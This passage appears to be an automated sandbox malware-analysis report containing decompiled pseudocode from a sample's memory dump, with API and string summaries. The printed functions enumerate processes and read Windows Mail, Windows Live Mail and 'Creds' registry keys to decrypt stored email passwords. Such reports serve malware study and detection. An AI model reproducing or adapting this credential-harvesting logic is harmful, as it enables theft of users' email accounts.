                                                              					}
                                                              					goto L10;
                                                              				}
                                                              			}






                                                              0x0040e0e1
                                                              0x0040e171
                                                              0x0040e171
                                                              0x0040e0ed
                                                              0x0040e0f3
                                                              0x0040e0f7
                                                              0x0040e170
                                                              0x00000000
                                                              0x0040e0f9
                                                              0x0040e106
                                                              0x0040e10a
                                                              0x0040e10f
                                                              0x0040e117
                                                              0x0040e11b
                                                              0x0040e120
                                                              0x0040e128
                                                              0x0040e12c
                                                              0x0040e131
                                                              0x0040e139
                                                              0x0040e13d
                                                              0x0040e142
                                                              0x0040e14a
                                                              0x0040e14e
                                                              0x0040e153
                                                              0x0040e155
                                                              0x0040e155
                                                              0x0040e153
                                                              0x0040e142
                                                              0x0040e131
                                                              0x0040e120
                                                              0x0040e167
                                                              0x0040e16a
                                                              0x0040e16a
                                                              0x00000000
                                                              0x0040e167

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                              • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-232097475
                                                              • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                              • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                              • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                              • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 84%
                                                              			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                              				char _v6;
                                                              				char _v7;
                                                              				char _v8;
                                                              				int _v12;
                                                              				intOrPtr _v16;
                                                              				void* _v20;
                                                              				short* _v24;
                                                              				unsigned int _v28;
                                                              				char* _v32;
                                                              				int _v36;
                                                              				intOrPtr _v40;
                                                              				signed int _v44;
                                                              				void _v299;
                                                              				char _v300;
                                                              				void _v555;
                                                              				char _v556;
                                                              				char _v1080;
                                                              				void* __esi;
                                                              				int _t56;
                                                              				intOrPtr _t58;
                                                              				intOrPtr _t64;
                                                              				char _t92;
                                                              				char* _t93;
                                                              				void* _t100;
                                                              				signed int _t102;
                                                              				signed int _t107;
                                                              				intOrPtr _t108;
                                                              				void* _t113;
                                                              
                                                              				_t113 = __eflags;
                                                              				_t100 = __edx;
                                                              				_t93 = __eax;
                                                              				E004046D7( &_v1080);
                                                              				if(E004047A0( &_v1080, _t113) != 0) {
                                                              					_t56 = strlen(_t93);
                                                              					asm("cdq");
                                                              					_t107 = _t56 - _t100 >> 1;
                                                              					_t2 = _t107 + 1; // 0x1
                                                              					_t58 = _t2;
                                                              					L004115D0();
                                                              					_t102 = 0;
                                                              					_t96 = _t58;
                                                              					_v16 = _t58;
                                                              					if(_t107 > 0) {
                                                              						do {
                                                              							_v8 =  *((intOrPtr*)(_t93 + _t102 * 2));
                                                              							_v7 = _t93[1 + _t102 * 2];
                                                              							_v6 = 0;
                                                              							_t92 = E00406512( &_v8);
                                                              							_t96 = _v16;
                                                              							 *((char*)(_t102 + _v16)) = _t92;
                                                              							_t102 = _t102 + 1;
                                                              						} while (_t102 < _t107);
                                                              					}
                                                              					_v556 = 0;
                                                              					memset( &_v555, 0, 0xff);
                                                              					_v12 = 0;
                                                              					_v300 = 0;
                                                              					memset( &_v299, 0, 0xfe);
                                                              					_t64 =  *((intOrPtr*)(_a4 + 0x86c));
                                                              					if(_t64 != 1) {
                                                              						__eflags = _t64 - 2;
                                                              						if(_t64 == 2) {
                                                              							_push("Software\\Microsoft\\Windows Live Mail");
                                                              							goto L7;
                                                              						}
                                                              					} else {
                                                              						_push("Software\\Microsoft\\Windows Mail");
                                                              						L7:
                                                              						strcpy( &_v300, ??);
                                                              						_pop(_t96);
                                                              					}
                                                              					if(E0040EB3F(0x80000001,  &_v300,  &_v20) == 0) {
                                                              						_v12 = 0xff;
                                                              						E0040EBA3(_t96, _v20, "Salt",  &_v556,  &_v12);
                                                              						RegCloseKey(_v20);
                                                              					}
                                                              					_v40 = _v16;
                                                              					_v36 = _v12;
                                                              					_v32 =  &_v556;
                                                              					_v44 = _t107;
                                                              					if(E00404811( &_v1080,  &_v44,  &_v36,  &_v28) != 0) {
                                                              						_t108 = _a8;
                                                              						WideCharToMultiByte(0, 0, _v24, _v28 >> 1, _t108 + 0x400, 0xff, 0, 0);
                                                              						(_t108 + 0x400)[_v28 >> 1] = 0;
                                                              						LocalFree(_v24);
                                                              					}
                                                              					_push(_v16);
                                                              					L004115D6();
                                                              				}
                                                              				return E004047F1( &_v1080);
                                                              			}































                                                              0x00410525
                                                              0x00410525
                                                              0x00410536
                                                              0x00410538
                                                              0x00410544
                                                              0x0041054c
                                                              0x00410551
                                                              0x00410556
                                                              0x00410558
                                                              0x00410558
                                                              0x0041055c
                                                              0x00410562
                                                              0x00410566
                                                              0x00410567
                                                              0x0041056a
                                                              0x0041056c
                                                              0x0041056f
                                                              0x00410576
                                                              0x0041057d
                                                              0x00410581
                                                              0x00410587
                                                              0x0041058a
                                                              0x0041058d
                                                              0x0041058e
                                                              0x0041056c
                                                              0x004105a1
                                                              0x004105a8
                                                              0x004105bc
                                                              0x004105bf
                                                              0x004105c5
                                                              0x004105cd
                                                              0x004105d9
                                                              0x004105e2
                                                              0x004105e5
                                                              0x004105e7
                                                              0x00000000
                                                              0x004105e7
                                                              0x004105db
                                                              0x004105db
                                                              0x004105ec
                                                              0x004105f3
                                                              0x004105f9
                                                              0x004105f9
                                                              0x00410614
                                                              0x00410629
                                                              0x0041062c
                                                              0x00410637
                                                              0x00410637
                                                              0x00410640
                                                              0x00410646
                                                              0x0041064f
                                                              0x00410664
                                                              0x0041066e
                                                              0x00410670
                                                              0x00410688
                                                              0x00410693
                                                              0x0041069d
                                                              0x0041069d
                                                              0x004106a3
                                                              0x004106a6
                                                              0x004106ac
                                                              0x004106bb

                                                              APIs
                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                              • strlen.MSVCRT ref: 0041054C
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0041055C
                                                              • memset.MSVCRT ref: 004105A8
                                                              • memset.MSVCRT ref: 004105C5
                                                              • strcpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 004105F3
                                                              • RegCloseKey.ADVAPI32(?), ref: 00410637
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410688
                                                              • LocalFree.KERNEL32(?), ref: 0041069D
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004106A6
                                                                • Part of subcall function 00406512: strtoul.MSVCRT ref: 0040651A
                                                              Strings
                                                              • Salt, xrefs: 00410621
                                                              • Software\Microsoft\Windows Mail, xrefs: 004105DB
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004105E7
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                              • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                              • API String ID: 1673043434-2687544566
                                                              • Opcode ID: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                              • Instruction ID: 7afd7cd9a60bb03764dcbc3854d87102a14f95683297c5d7d0928fc071fa2b2b
                                                              • Opcode Fuzzy Hash: e02606ea618a87a1148e8cb15b8a6f6052109a9c4d8ad17a07ff7bfd0f9df468
                                                              • Instruction Fuzzy Hash: D14186B2C0011CAECB11DBA5DC81ADEBBBCAF48344F1041ABE645F3251DA349A95CB68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E0040CBA7(intOrPtr __ecx, intOrPtr _a4) {
                                                              				intOrPtr _v8;
                                                              				void _v619;
                                                              				char _v620;
                                                              				void _v1231;
                                                              				char _v1232;
                                                              				void* __edi;
                                                              				void* _t37;
                                                              				void* _t53;
                                                              				char* _t54;
                                                              				intOrPtr _t60;
                                                              				void* _t61;
                                                              				char* _t62;
                                                              				void* _t67;
                                                              				intOrPtr _t84;
                                                              				void* _t85;
                                                              				intOrPtr _t87;
                                                              				void* _t88;
                                                              				void* _t89;
                                                              
                                                              				_t87 = _a4;
                                                              				_t84 = __ecx;
                                                              				_v8 = __ecx;
                                                              				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                              					_t37 = 0;
                                                              				} else {
                                                              					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                              				}
                                                              				_push(0xa);
                                                              				_push("mailbox://");
                                                              				_push(_t37);
                                                              				L00411612();
                                                              				_t89 = _t88 + 0xc;
                                                              				if(_t37 == 0) {
                                                              					L8:
                                                              					_a4 = 0;
                                                              					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
                                                              						while(1) {
                                                              							_t85 = E0040D438(_a4, _t84 + 0x468);
                                                              							_v620 = 0;
                                                              							memset( &_v619, 0, 0x261);
                                                              							_v1232 = 0;
                                                              							memset( &_v1231, 0, 0x261);
                                                              							_t17 = _t85 + 0x104; // 0x104
                                                              							_t18 = _t85 + 0x204; // 0x204
                                                              							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                              							_t20 = _t85 + 0x104; // 0x104
                                                              							_t21 = _t85 + 0x204; // 0x204
                                                              							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                              							_t53 = 0;
                                                              							_t89 = _t89 + 0x38;
                                                              							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                              								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                              							}
                                                              							_push(_t53);
                                                              							_t54 =  &_v620;
                                                              							_push(_t54);
                                                              							L004115B2();
                                                              							if(_t54 == 0) {
                                                              								goto L17;
                                                              							}
                                                              							_t61 = 0;
                                                              							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                              								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                              							}
                                                              							_push(_t61);
                                                              							_t62 =  &_v1232;
                                                              							_push(_t62);
                                                              							L004115B2();
                                                              							if(_t62 != 0) {
                                                              								L18:
                                                              								_a4 = _a4 + 1;
                                                              								_t60 = _v8;
                                                              								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
                                                              									_t84 = _t60;
                                                              									continue;
                                                              								} else {
                                                              								}
                                                              							} else {
                                                              								goto L17;
                                                              							}
                                                              							goto L21;
                                                              							L17:
                                                              							if( *((char*)(E00406B0F( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
                                                              								E00401380(_t57 + 1, _t85 + 0x304, 0xff);
                                                              							} else {
                                                              								goto L18;
                                                              							}
                                                              							goto L21;
                                                              						}
                                                              					}
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                              						_t67 = 0;
                                                              					} else {
                                                              						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                              					}
                                                              					_push(7);
                                                              					_push("imap://");
                                                              					_push(_t67);
                                                              					L00411612();
                                                              					_t89 = _t89 + 0xc;
                                                              					if(_t67 == 0) {
                                                              						goto L8;
                                                              					}
                                                              				}
                                                              				L21:
                                                              				return 1;
                                                              			}





















                                                              0x0040cbb2
                                                              0x0040cbbb
                                                              0x0040cbbd
                                                              0x0040cbc0
                                                              0x0040cbcc
                                                              0x0040cbc2
                                                              0x0040cbc7
                                                              0x0040cbc7
                                                              0x0040cbce
                                                              0x0040cbd0
                                                              0x0040cbd5
                                                              0x0040cbd6
                                                              0x0040cbdb
                                                              0x0040cbe0
                                                              0x0040cc0b
                                                              0x0040cc11
                                                              0x0040cc14
                                                              0x0040cc23
                                                              0x0040cc32
                                                              0x0040cc3d
                                                              0x0040cc44
                                                              0x0040cc53
                                                              0x0040cc5a
                                                              0x0040cc5f
                                                              0x0040cc66
                                                              0x0040cc79
                                                              0x0040cc7e
                                                              0x0040cc85
                                                              0x0040cc98
                                                              0x0040cc9d
                                                              0x0040cc9f
                                                              0x0040cca5
                                                              0x0040ccac
                                                              0x0040ccac
                                                              0x0040ccaf
                                                              0x0040ccb0
                                                              0x0040ccb6
                                                              0x0040ccb7
                                                              0x0040ccc0
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ccc2
                                                              0x0040ccc7
                                                              0x0040ccce
                                                              0x0040ccce
                                                              0x0040ccd1
                                                              0x0040ccd2
                                                              0x0040ccd8
                                                              0x0040ccd9
                                                              0x0040cce2
                                                              0x0040ccf4
                                                              0x0040ccf4
                                                              0x0040ccf7
                                                              0x0040cd03
                                                              0x0040cc21
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cd09
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cce4
                                                              0x0040ccf2
                                                              0x0040cd17
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ccf2
                                                              0x0040cc23
                                                              0x0040cbe2
                                                              0x0040cbe5
                                                              0x0040cbf1
                                                              0x0040cbe7
                                                              0x0040cbec
                                                              0x0040cbec
                                                              0x0040cbf3
                                                              0x0040cbf5
                                                              0x0040cbfa
                                                              0x0040cbfb
                                                              0x0040cc00
                                                              0x0040cc05
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cc05
                                                              0x0040cd1e
                                                              0x0040cd24

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _stricmp_strnicmpmemsetsprintf$strlen
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 4281260487-2229823034
                                                              • Opcode ID: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                              • Instruction ID: 9e102a0fb77db954c7e66e430d6901f6f24083c0ab16dd7aca32eaa7b9d40139
                                                              • Opcode Fuzzy Hash: e9e02f881341a7f68f4078179dffa19dbd3d5546575d598c2616a551df887c2f
                                                              • Instruction Fuzzy Hash: B84163B1604205EFD724DB69C881F96B7E8AF04344F144A7BEA4AE7281D738FA448B58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 82%
                                                              			E0040CBA5(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
                                                              				intOrPtr _v8;
                                                              				void _v619;
                                                              				char _v620;
                                                              				void _v1231;
                                                              				char _v1232;
                                                              				void* __edi;
                                                              				void* _t39;
                                                              				void* _t55;
                                                              				char* _t56;
                                                              				intOrPtr _t62;
                                                              				void* _t63;
                                                              				char* _t64;
                                                              				void* _t69;
                                                              				intOrPtr _t89;
                                                              				void* _t91;
                                                              				intOrPtr _t94;
                                                              				void* _t99;
                                                              				void* _t100;
                                                              				void* _t101;
                                                              
                                                              				_t100 = _t99 - 0x4cc;
                                                              				_t94 = _a4;
                                                              				_t89 = __ecx;
                                                              				_v8 = __ecx;
                                                              				if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                              					_t39 = 0;
                                                              				} else {
                                                              					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                              				}
                                                              				_push(0xa);
                                                              				_push("mailbox://");
                                                              				_push(_t39);
                                                              				L00411612();
                                                              				_t101 = _t100 + 0xc;
                                                              				if(_t39 == 0) {
                                                              					L9:
                                                              					_a4 = 0;
                                                              					if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
                                                              						while(1) {
                                                              							_t91 = E0040D438(_a4, _t89 + 0x468);
                                                              							_v620 = 0;
                                                              							memset( &_v619, 0, 0x261);
                                                              							_v1232 = 0;
                                                              							memset( &_v1231, 0, 0x261);
                                                              							_t17 = _t91 + 0x104; // 0x104
                                                              							_t18 = _t91 + 0x204; // 0x204
                                                              							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                              							_t20 = _t91 + 0x104; // 0x104
                                                              							_t21 = _t91 + 0x204; // 0x204
                                                              							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                              							_t55 = 0;
                                                              							_t101 = _t101 + 0x38;
                                                              							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                              								_t55 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                              							}
                                                              							_push(_t55);
                                                              							_t56 =  &_v620;
                                                              							_push(_t56);
                                                              							L004115B2();
                                                              							if(_t56 == 0) {
                                                              								goto L18;
                                                              							}
                                                              							_t63 = 0;
                                                              							if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
                                                              								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                              							}
                                                              							_push(_t63);
                                                              							_t64 =  &_v1232;
                                                              							_push(_t64);
                                                              							L004115B2();
                                                              							if(_t64 != 0) {
                                                              								L19:
                                                              								_a4 = _a4 + 1;
                                                              								_t62 = _v8;
                                                              								if(_a4 <  *((intOrPtr*)(_t62 + 0x474))) {
                                                              									_t89 = _t62;
                                                              									continue;
                                                              								} else {
                                                              								}
                                                              							} else {
                                                              								goto L18;
                                                              							}
                                                              							goto L22;
                                                              							L18:
                                                              							if( *((char*)(E00406B0F( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
                                                              								E00401380(_t59 + 1, _t91 + 0x304, 0xff);
                                                              							} else {
                                                              								goto L19;
                                                              							}
                                                              							goto L22;
                                                              						}
                                                              					}
                                                              				} else {
                                                              					if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
                                                              						_t69 = 0;
                                                              					} else {
                                                              						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                              					}
                                                              					_push(7);
                                                              					_push("imap://");
                                                              					_push(_t69);
                                                              					L00411612();
                                                              					_t101 = _t101 + 0xc;
                                                              					if(_t69 == 0) {
                                                              						goto L9;
                                                              					}
                                                              				}
                                                              				L22:
                                                              				return 1;
                                                              			}






















                                                              0x0040cbaa
                                                              0x0040cbb2
                                                              0x0040cbbb
                                                              0x0040cbbd
                                                              0x0040cbc0
                                                              0x0040cbcc
                                                              0x0040cbc2
                                                              0x0040cbc7
                                                              0x0040cbc7
                                                              0x0040cbce
                                                              0x0040cbd0
                                                              0x0040cbd5
                                                              0x0040cbd6
                                                              0x0040cbdb
                                                              0x0040cbe0
                                                              0x0040cc0b
                                                              0x0040cc11
                                                              0x0040cc14
                                                              0x0040cc23
                                                              0x0040cc32
                                                              0x0040cc3d
                                                              0x0040cc44
                                                              0x0040cc53
                                                              0x0040cc5a
                                                              0x0040cc5f
                                                              0x0040cc66
                                                              0x0040cc79
                                                              0x0040cc7e
                                                              0x0040cc85
                                                              0x0040cc98
                                                              0x0040cc9d
                                                              0x0040cc9f
                                                              0x0040cca5
                                                              0x0040ccac
                                                              0x0040ccac
                                                              0x0040ccaf
                                                              0x0040ccb0
                                                              0x0040ccb6
                                                              0x0040ccb7
                                                              0x0040ccc0
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ccc2
                                                              0x0040ccc7
                                                              0x0040ccce
                                                              0x0040ccce
                                                              0x0040ccd1
                                                              0x0040ccd2
                                                              0x0040ccd8
                                                              0x0040ccd9
                                                              0x0040cce2
                                                              0x0040ccf4
                                                              0x0040ccf4
                                                              0x0040ccf7
                                                              0x0040cd03
                                                              0x0040cc21
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cd09
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cce4
                                                              0x0040ccf2
                                                              0x0040cd17
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040ccf2
                                                              0x0040cc23
                                                              0x0040cbe2
                                                              0x0040cbe5
                                                              0x0040cbf1
                                                              0x0040cbe7
                                                              0x0040cbec
                                                              0x0040cbec
                                                              0x0040cbf3
                                                              0x0040cbf5
                                                              0x0040cbfa
                                                              0x0040cbfb
                                                              0x0040cc00
                                                              0x0040cc05
                                                              0x00000000
                                                              0x00000000
                                                              0x0040cc05
                                                              0x0040cd1d
                                                              0x0040cd24

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _stricmp_strnicmpmemsetsprintf
                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                              • API String ID: 2822975062-2229823034
                                                              • Opcode ID: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                              • Instruction ID: 56d5f4bbafa72d85e66e322173295d9522024af121689b7315c9fa9ceefdefbd
                                                              • Opcode Fuzzy Hash: b6ee68a00b14a896bd5f4a1625b3665dec952f704790df008a5e90175c698e8f
                                                              • Instruction Fuzzy Hash: 754150B1604605EFD724DB69C8C1F96B7E8AF04304F14466BEA4AE7281D738FA45CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 56%
                                                              			E0040D6FB(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, char _a12, void* _a16) {
                                                              				int _v8;
                                                              				int _v12;
                                                              				void* _v16;
                                                              				short* _v20;
                                                              				int _v24;
                                                              				char* _v28;
                                                              				char _v32;
                                                              				intOrPtr _v36;
                                                              				char _v40;
                                                              				int _v44;
                                                              				void _v299;
                                                              				char _v300;
                                                              				char _v556;
                                                              				char _v812;
                                                              				char _v4908;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				long _t46;
                                                              				int* _t84;
                                                              				char* _t85;
                                                              
                                                              				E004118A0(0x132c, __ecx);
                                                              				_t84 = 0;
                                                              				_t46 = RegOpenKeyExA(_a16, "Creds", 0, 0x20019,  &_a16);
                                                              				if(_t46 != 0) {
                                                              					return _t46;
                                                              				}
                                                              				_v300 = _t46;
                                                              				memset( &_v299, 0, 0xff);
                                                              				_push(0xff);
                                                              				_push( &_v300);
                                                              				_v8 = 0;
                                                              				_push(0);
                                                              				while(RegEnumKeyA(_a16, ??, ??, ??) == 0) {
                                                              					if(RegOpenKeyExA(_a16,  &_v300, _t84, 0x20019,  &_v16) == 0) {
                                                              						_v12 = 0x1000;
                                                              						if(RegQueryValueExA(_v16, "ps:password", _t84,  &_v44,  &_v4908,  &_v12) == 0) {
                                                              							_v32 = _v12;
                                                              							_v28 =  &_v4908;
                                                              							_v40 = _a12;
                                                              							_v36 = _a8;
                                                              							if(E00404811(_a4 + 0xc,  &_v32,  &_v40,  &_v24) != 0) {
                                                              								_t85 =  &_v812;
                                                              								_v812 = 0;
                                                              								_v556 = 0;
                                                              								E004060D0(0xff, _t85,  &_v300);
                                                              								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
                                                              								 *((intOrPtr*)( *_a4))(_t85);
                                                              								LocalFree(_v20);
                                                              								_t84 = 0;
                                                              							}
                                                              						}
                                                              						RegCloseKey(_v16);
                                                              					}
                                                              					_v8 = _v8 + 1;
                                                              					_push(0xff);
                                                              					_push( &_v300);
                                                              					_push(_v8);
                                                              				}
                                                              				return RegCloseKey(_a16);
                                                              			}























                                                              0x0040d703
                                                              0x0040d71a
                                                              0x0040d725
                                                              0x0040d729
                                                              0x0040d862
                                                              0x0040d862
                                                              0x0040d735
                                                              0x0040d743
                                                              0x0040d74b
                                                              0x0040d752
                                                              0x0040d753
                                                              0x0040d756
                                                              0x0040d844
                                                              0x0040d774
                                                              0x0040d792
                                                              0x0040d7a1
                                                              0x0040d7aa
                                                              0x0040d7b3
                                                              0x0040d7b9
                                                              0x0040d7bf
                                                              0x0040d7db
                                                              0x0040d7e4
                                                              0x0040d7ea
                                                              0x0040d7f1
                                                              0x0040d7f8
                                                              0x0040d812
                                                              0x0040d820
                                                              0x0040d825
                                                              0x0040d82b
                                                              0x0040d82b
                                                              0x0040d7db
                                                              0x0040d830
                                                              0x0040d830
                                                              0x0040d836
                                                              0x0040d839
                                                              0x0040d840
                                                              0x0040d841
                                                              0x0040d841
                                                              0x00000000

                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                              • memset.MSVCRT ref: 0040D743
                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                              • LocalFree.KERNEL32(?), ref: 0040D825
                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                              • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                              • API String ID: 551151806-1288872324
                                                              • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                              • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                              • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                              • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 56%
                                                              			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                              				void _v4103;
                                                              				char _v4104;
                                                              				char _t30;
                                                              				struct HMENU__* _t32;
                                                              				char _t39;
                                                              				void* _t42;
                                                              				struct HWND__* _t43;
                                                              				struct HMENU__* _t48;
                                                              
                                                              				_t42 = __edi;
                                                              				_t38 = __ecx;
                                                              				E004118A0(0x1004, __ecx);
                                                              				_t55 = _a8 - 4;
                                                              				if(_a8 != 4) {
                                                              					__eflags = _a8 - 5;
                                                              					if(_a8 == 5) {
                                                              						_t39 =  *0x417488;
                                                              						__eflags = _t39;
                                                              						if(_t39 == 0) {
                                                              							L8:
                                                              							_push(_t42);
                                                              							sprintf(0x4172c0, "dialog_%d", _a12);
                                                              							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
